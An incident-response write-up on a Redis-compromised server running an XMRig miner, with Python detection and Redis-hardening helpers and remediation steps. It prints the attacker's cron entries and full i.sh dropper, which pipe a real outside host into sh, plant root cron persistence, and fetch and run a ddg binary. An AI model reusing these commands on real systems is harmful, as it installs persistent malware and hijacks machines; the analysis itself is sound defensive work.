Server implanted with a mining program
The server was compromised: the intruder used a Redis unauthorized-access vulnerability to implant a mining program.
A Redis unauthorized-access vulnerability can easily lead to the system being taken over.
Run htop.
An abnormal process is found.
Inspect the abnormal process: sudo ls -al /proc/25461
dr-xr-xr-x 9 deployer postgres 0 Nov 6 13:15 .
dr-xr-xr-x 193 root root 0 Aug 19 12:05 ..
dr-xr-xr-x 2 deployer postgres 0 Nov 6 13:15 attr
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 autogroup
-r-------- 1 deployer postgres 0 Nov 6 13:15 auxv
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 cgroup
--w------- 1 deployer postgres 0 Nov 6 13:15 clear_refs
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 cmdline
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 comm
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 coredump_filter
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 cpuset
lrwxrwxrwx 1 deployer postgres 0 Nov 6 13:15 cwd -> /
-r-------- 1 deployer postgres 0 Nov 6 13:15 environ
lrwxrwxrwx 1 deployer postgres 0 Nov 6 13:15 exe -> /var/lib/postgresql/9.3/main/x3776026004
dr-x------ 2 deployer postgres 0 Nov 6 13:15 fd
dr-x------ 2 deployer postgres 0 Nov 6 13:15 fdinfo
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 gid_map
-r-------- 1 deployer postgres 0 Nov 6 13:15 io
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 latency
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 limits
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 loginuid
dr-x------ 2 deployer postgres 0 Nov 6 13:15 map_files
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 maps
-rw------- 1 deployer postgres 0 Nov 6 13:15 mem
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 mountinfo
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 mounts
-r-------- 1 deployer postgres 0 Nov 6 13:15 mountstats
dr-xr-xr-x 5 deployer postgres 0 Nov 6 13:15 net
dr-x--x--x 2 deployer postgres 0 Nov 6 13:15 ns
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 numa_maps
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 oom_adj
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 oom_score
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 oom_score_adj
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 pagemap
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 personality
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 projid_map
lrwxrwxrwx 1 deployer postgres 0 Nov 6 13:15 root -> /
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 sched
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 schedstat
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 sessionid
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 smaps
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 stack
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 stat
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 statm
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 status
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 syscall
dr-xr-xr-x 13 deployer postgres 0 Nov 6 13:15 task
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 timers
-rw-r--r-- 1 deployer postgres 0 Nov 6 13:15 uid_map
-r--r--r-- 1 deployer postgres 0 Nov 6 13:15 wchan
The abnormal process's executable is exe -> /var/lib/postgresql/9.3/main/x3776026004
Look at the pg directory /var/lib/postgresql/9.3/main:
drwx------ 15 deployer postgres 4096 Oct 23 04:33 ./
drwxr-xr-x 3 deployer postgres 4096 Aug 16 2016 ../
drwx------ 6 deployer postgres 4096 Aug 30 17:53 base/
drwx------ 2 deployer postgres 4096 Sep 5 16:08 global/
drwx------ 2 deployer postgres 4096 Aug 16 2016 pg_clog/
drwx------ 4 deployer postgres 4096 Aug 16 2016 pg_multixact/
drwx------ 2 deployer postgres 4096 Aug 30 18:13 pg_notify/
drwx------ 2 deployer postgres 4096 Aug 16 2016 pg_serial/
drwx------ 2 deployer postgres 4096 Aug 16 2016 pg_snapshots/
drwx------ 2 deployer postgres 4096 Aug 30 18:13 pg_stat/
drwx------ 2 deployer postgres 4096 Nov 6 12:19 pg_stat_tmp/
drwx------ 2 deployer postgres 4096 Aug 16 2016 pg_subtrans/
drwx------ 2 deployer postgres 4096 Aug 16 2016 pg_tblspc/
drwx------ 2 deployer postgres 4096 Aug 16 2016 pg_twophase/
-rw------- 1 deployer postgres 4 Aug 16 2016 PG_VERSION
drwx------ 3 deployer postgres 4096 Aug 16 2016 pg_xlog/
-rw------- 1 deployer postgres 133 Aug 30 18:13 postmaster.opts
-rw------- 1 deployer postgres 93 Aug 30 18:13 postmaster.pid
-rwxrwxrwx 1 deployer postgres 14480 Oct 13 10:06 ps3767604655*
-rw-r--r-- 1 deployer postgres 15360 Oct 12 03:58 vcredist_x64_1130.dll
-rw-r--r-- 1 deployer postgres 100352 Oct 13 04:52 vcredist_x64_2191.dll
-rw-r--r-- 1 deployer postgres 15360 Oct 12 08:50 vcredist_x64_5569.dll
-rw-r--r-- 1 deployer postgres 100352 Oct 23 04:33 vcredist_x64_6375.dll
-rw-r--r-- 1 deployer postgres 100352 Oct 16 05:12 vcredist_x64_8544.dll
-rw-r--r-- 1 deployer postgres 11264 Oct 12 03:58 vcredist_x86_1071.dll
-rw-r--r-- 1 deployer postgres 11264 Oct 12 08:50 vcredist_x86_5380.dll
-rw-r--r-- 1 deployer postgres 81408 Oct 23 04:33 vcredist_x86_7537.dll
-rw-r--r-- 1 deployer postgres 81408 Oct 13 04:52 vcredist_x86_9105.dll
-rw-r--r-- 1 deployer postgres 81408 Oct 16 05:12 vcredist_x86_928.dll
-rwxrwxrwx 1 deployer postgres 496464 Oct 13 10:06 x3776026004*
-rw------- 1 deployer postgres 4676439 Nov 6 12:19 xmr.txt
The malicious program (x3776026004) was implanted on 13 October 2017 at 10:06.
View the xmr.txt file:
[2017-10-13 10:06:31] * VERSIONS: XMRig/2.3.1-dev libuv/1.9.1 gcc/6.3.0
[2017-10-13 10:06:31] * HUGE PAGES: available, disabled
[2017-10-13 10:06:31] * CPU: Intel(R) Xeon(R) CPU E5-26xx v3 (1) x64 AES-NI
[2017-10-13 10:06:31] * CPU L2/L3: 24.0 MB/0.0 MB
[2017-10-13 10:06:31] * THREADS: 6, cryptonight, av=1, donate=0%
[2017-10-13 10:06:31] * POOL #1: xmr.crypto-pool.fr:80
[2017-10-13 10:06:31] * COMMANDS: 'h' hashrate, 'p' pause, 'r' resume
[2017-10-13 10:06:31] use pool xmr.crypto-pool.fr:80 163.172.226.114
[2017-10-13 10:06:31] new job from xmr.crypto-pool.fr:80 diff 50000
[2017-10-13 10:06:37] new job from xmr.crypto-pool.fr:80 diff 50000
[2017-10-13 10:06:47] new job from xmr.crypto-pool.fr:80 diff 50000
It connects to xmr.crypto-pool.fr.
This malicious program is a cryptocurrency miner.
Check /var/spool/cron/crontabs/.
Scheduled tasks are found:
*/1 * * * * curl -L http://218.248.40.228:8443/i.sh | sh
*/1 * * * * wget -q http://218.248.40.228:8443/i.sh -O - | sh
The malicious code (i.sh) is as follows:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root
if [ ! -f "/tmp/ddg.2020" ]; then
curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020
fi
if [ ! -f "/tmp/ddg.2020" ]; then
wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020
fi
chmod +x /tmp/ddg.2020 && /tmp/ddg.2020
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
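The two checks walked through above, the exe link under /proc/<pid> and the cron entries that fetch i.sh, can be turned into a repeatable audit. The script below is an added example and not part of the original write-up: the download-and-pipe-to-shell pattern and the list of data directories are my own assumptions, and the sample crontab and process map are constructed from the indicators shown in the write-up.

```python
import os
import re

# Assumption (not from the write-up): a cron command that fetches a URL and
# pipes the result straight into a shell is treated as hostile persistence.
DOWNLOAD_TO_SHELL = re.compile(
    r"\b(curl|wget)\b[^|\n]*https?://[^\s|]+[^|\n]*\|\s*(ba)?sh\b")

# Assumption: these directories hold data or scratch files, never binaries,
# so a process whose /proc/<pid>/exe resolves here deserves a look.
DATA_DIRS = ("/var/lib/postgresql/", "/tmp/", "/dev/shm/", "/var/spool/")


def suspicious_cron_lines(crontab_text):
    """Return cron entries that download remote code and execute it."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and DOWNLOAD_TO_SHELL.search(line):
            hits.append(line)
    return hits


def suspicious_processes(exe_by_pid):
    """Return pid -> exe for processes whose binary lives in a data directory."""
    return {pid: exe for pid, exe in exe_by_pid.items()
            if exe.startswith(DATA_DIRS)}


def live_exe_map():
    """Build pid -> exe from a real /proc (the same link ls -al /proc/<pid> shows)."""
    result = {}
    for name in os.listdir("/proc"):
        if name.isdigit():
            try:
                result[int(name)] = os.readlink(f"/proc/{name}/exe")
            except OSError:  # process exited, or not readable without root
                continue
    return result


# Constructed samples: the two cron lines from the write-up plus one benign
# job, and a pid -> exe map shaped like the write-up's /proc listing.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/1 * * * * curl -L http://218.248.40.228:8443/i.sh | sh
*/1 * * * * wget -q http://218.248.40.228:8443/i.sh -O - | sh
0 3 * * * /usr/bin/pg_dump mydb > /backup/mydb.sql
"""
SAMPLE_EXES = {1: "/sbin/init",
               25461: "/var/lib/postgresql/9.3/main/x3776026004",
               9001: "/usr/lib/postgresql/9.3/bin/postgres"}
```

On a live host, feed suspicious_processes(live_exe_map()) and suspicious_cron_lines() over the contents of /var/spool/cron/crontabs/* (run as root so every exe link is readable).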
Remediation steps:
1. Block the mining pool at the firewall: iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
2. Check the scheduled tasks in crontab and delete the malicious entries.
3. Harden Redis: use the bind option to restrict which IPs may connect to the Redis server, change the default port 6379, and configure the rename-command option.
4. Check whether the /tmp directory contains suspicious files; find and remove them.
5. Check ~/.ssh/authorized_keys and delete any entries for accounts you do not recognise.
6. Watch with htop for a while to make sure the mining daemon has been killed and the miner does not start up again.
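The Redis items in step 3 (restrict bind, move off port 6379, set rename-command) can be verified mechanically against redis.conf. The following is an added example and not from the original write-up; bind, port and rename-command are real redis.conf directives, the set of commands it expects to be renamed is my own assumption, and both sample configs are constructed.

```python
# Assumption (not from the write-up): which commands must be renamed is my
# choice; bind, port and rename-command are standard redis.conf directives.
DANGEROUS_COMMANDS = ("CONFIG", "FLUSHALL", "FLUSHDB", "DEBUG")


def parse_redis_conf(text):
    """Return (directive, args) pairs; a redis.conf comment is a line starting with #."""
    entries = []
    for raw in text.splitlines():
        parts = raw.split()
        if parts and not parts[0].startswith("#"):
            entries.append((parts[0].lower(), parts[1:]))
    return entries


def redis_conf_findings(text):
    """List the hardening items from the remediation steps that this config misses."""
    entries = parse_redis_conf(text)
    findings = []
    binds = [a for d, args in entries if d == "bind" for a in args]
    if not binds:
        findings.append("bind: not set, Redis accepts connections on every interface")
    elif any(a in ("0.0.0.0", "*", "::") for a in binds):
        findings.append("bind: wildcard address, reachable from any host")
    ports = [args[0] for d, args in entries if d == "port" and args]
    if not ports or ports[-1] == "6379":
        findings.append("port: still the default 6379 that scanners probe first")
    renamed = {args[0].upper() for d, args in entries
               if d == "rename-command" and args}
    for cmd in DANGEROUS_COMMANDS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} keeps its default name")
    return findings


# Constructed samples: a stock-style config and one with the three fixes applied.
WEAK_CONF = """\
# no bind line, so every interface is used
port 6379
"""
HARDENED_CONF = """\
# only the loopback and one constructed internal address may connect
bind 127.0.0.1 10.0.0.5
port 16379
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command DEBUG ""
"""
```

Run redis_conf_findings() over the file Redis was started with (the path is shown by the redis-server process's command line) and an empty list means all three items are in place.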